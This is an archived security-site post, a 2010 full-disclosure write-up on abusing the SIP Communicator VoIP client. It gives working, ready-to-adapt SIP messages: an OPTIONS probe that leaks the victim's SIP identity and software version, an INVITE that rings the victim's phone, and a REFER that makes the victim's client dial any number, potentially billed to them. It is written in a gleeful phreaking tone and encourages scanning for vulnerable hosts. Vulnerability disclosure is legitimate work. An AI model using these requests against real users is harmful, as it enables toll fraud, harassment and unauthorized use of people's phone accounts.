exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Brief Whitepaper On Tinkering With SIP

Brief Whitepaper On Tinkering With SIP
Posted Dec 1, 2010
Authored by stormrider

This is a small write-up discussing how to mess with SIP.

tags | paper
SHA-256 | 2a3df45ec1da80a98c2693540f29fcb9861c53dfe978a1792c51f023472e81af

Brief Whitepaper On Tinkering With SIP

Change Mirror Download
Salve Full-Disclosure!

There is a nice open source software floating around for VoIP
communication, namely "SIP Communicator". For phreakers phun the
developers have not taken care of much security aspects when
implementing the SIP protocol.

Now as I got bored scanning around for open 5060 ports I decided to
share my findings with you. Nice, eh?

SIP defines a whole bunch of messages to communicate with clients. Some
of the more useful for me are OPTIONS and (of course) INVITE and my
personal favorite is definitely REFER. Funny things can also happen when
using the MESSAGE type.

Short intro to SIP first...

SIP is a protocol mostly used over UDP. It has a HTTP like look and is
used for Session Initialization of VoIP communication. It is used for
signaling calls and host capabilities (i.e. supported protocols). Many
other things can be done with SIP though. If you're interested read
http://www.ietf.org/rfc/rfc3261.txt.

Now, for the quick start, SIP defines the OPTIONS message to ask a
client for what is supported and what is not. An OPTIONS request might
look like this (... means truncated for readability):

OPTIONS sip:1234567890@snafu.com SIP/2.0
Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d ...
Max-Forwards: 70
To: <sip:1234567890@snafu.com>
From: "A Friend" <sip:133713371337@snafu.com>;tag=70e763707a
Call-ID: 112071fe7c
CSeq: 63104 OPTIONS
Contact: <sip:133713371337@snafu.com>
Accept: application/sdp
Content-Length: 0

This is pretty much self-explanatory. The from-line tells who is
requesting the information, the To-line says to whom it is sent.
Now before responding *good* SIP clients check if the 'To'-line matches
the number that is really registered on the host. Well, *bad* clients
don't :-)
As you might guess this is where it begins to get phunny... really, this
is the single stupid point that makes a butterfly change the weather...

If you have a client running SIP Communicator you can easily use the
above OPTIONS sample and (no matter what 'From' or 'To' lines contain)
it will honestly answer to your request. It might respond with sth. like
(... means truncated for readability):

SIP/2.0 200 OK
To: <sip:1234567890@snafu.com>;tag=df7a2b75
Via: SIP/2.0/UDP 1.2.3.4;branch=371be296e3d5d72ee20183d3d146797 ...
CSeq: 63104 OPTIONS
Call-ID: 112071fe7c
From: "A Friend" <sip:133713371337@snafu.com>;tag=70e763707a
Contact: "4461288"
<sip:4461288@192.168.1.15:5060;transport=udp;registering_acc=sipgate_de>
User-Agent: SIP Communicator1.0-alpha6-nightly.build.3041Windows 7
Allow: INFO,OPTIONS,MESSAGE,BYE,REFER,ACK,CANCEL,NOTIFY,INVITE ...
Allow-Events: refer
Content-Length: 0

Not that interesting you might say. But it tells you a lot!
The "User-Agent" tells you that there is "SIP Communicator" running (and
also the version up to the last bit - crazy!). Take a closer look at the
"Contact" line. It tells you the LAN IP of the host, but don't care
about it, its useless for now. It further tells you the registrar and
the phone number that are registered on the host. In this case it's
"sip:4461288@sipgate.de". Thats the host's "SIP identity". Keep this in
mind.
Before we start the real phunny things let's just ring the phone a bit.

All you need to make SIP Communicator ring is an INVITE message. As with
OPTIONS it will react to the message regardless of the 'To' and 'From'
headers. So the following message might just do the job (... means
truncated for readability):

INVITE sip:1337@snafu.com:5060;transport=udp;registering_acc=sn ...
Record-Route: <sip:p1.snafu.com;lr>
Via: SIP/2.0/UDP 127.0.0.1;branch=stupidbranchtag
From: "A Friend" <sip:133713371337@snafu.com>;tag=f5cb6e692d
To: <sip:1234567890@snafu.com>
Contact: <sip:133713371337@snafu.com>
Call-ID: 2f6633739b@snafu.com
CSeq: 102 INVITE
Max-Forwards: 70
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Type: application/sdp
Content-Length: 449

v=0
o=root 23830 23830 IN IP4 98.15.131.42
s=session
c=IN IP4 98.15.131.42
t=0 0
m=audio 35430 RTP/AVP 8 0 3 97 18 112 101
a=rtpmap:8 PCMA/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:3 GSM/8000
a=rtpmap:97 iLBC/8000
a=fmtp:97 mode=30
a=rtpmap:18 G729/8000
a=fmtp:18 annexb=no
a=rtpmap:112 G726-32/8000
a=rtpmap:101 telephone-event/8000
a=fmtp:101 0-16
a=silenceSupp:off - - - -
a=ptime:20
a=sendrecv
a=direction:active
a=nortpproxy:yes

And it turns out, SIP Communicator happily starts ringing just as if
someone was calling.

Ok, that is way phunny but you know SIP is much more powerful. A very
interesting part of the SIP protocol defines the "REFER" message. That
is some kind of a relay message that tells a host "Please put me through
to XYZ". Again, this a very useful feature of SIP but only when the VoIP
software acts carefully when receiving these messages. As mentioned
before, "SIP Communicator" doesn't handle that very restrictive. In
contrast to an INVITE message "SIP Communicator" needs correct values
for the sip-ID of the host it resides on. So for constructing a valid
REFER request we need the users sip-ID. Remember the OPTIONS message and
the "Contact" line in its response? We already got the ID! With these
infos and some enclosure we can construct a REFER request that lets SIP
Communicator call an arbitrary telephone number. We use the origins
sip-ID for REFER and Contact lines and construct a sip-ID from the phone
number to call and the SIP provider of the client in the "Refer-To"
line. We might want call the number 1-800-FUCKYOU (that is 18003825968):

REFER sip:4461288@sipgate.de SIP/2.0
Via: SIP/2.0/UDP 1.2.3.4;branch=31f175a7e2d ...
Max-Forwards: 70
To: <sip:4461288@sipgate.de>
From: "A Friend" <sip:133713371337@snafu.com>;tag=ae894a32e8
Call-ID: 5fae3cc039
CSeq: 93809824 REFER
Contact: <sip:4461288@sipgate.de>
Refer-To: sip:18003825968@sipgate.de
Content-Length: 0

If you then get an answer that says "SIP/2.0 202 Accepted" you got it.

- PLEASE - be advised, that calling a number from someones SIP phone
might generate costs on his bill. If the user using SIP Communicator has
a prepaid account it might not even work if you try to call so. on the
landline and there is not enough money available to make that call.
Be nice and don't spend other people's money!!

There are not much SIP Communicator installations around that are
reachable over the inet and so you can hardly find some hosts to attack.
Instead you may find many other products responding to probes but as far
as I can tell they are all much better protected.

Anyway, scanning for vulnerable hosts is an easy task because we're
using UDP. No three-way-handshake and nasty things. Just send and forget.

Maybe it is just the right time to dive deeper into SIP and VoIP things.
New applications come out each day, the industry around that sector
grows and grows and SS7 and companions are still underdeveloped.


keep on phrocking,

stormrider

Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close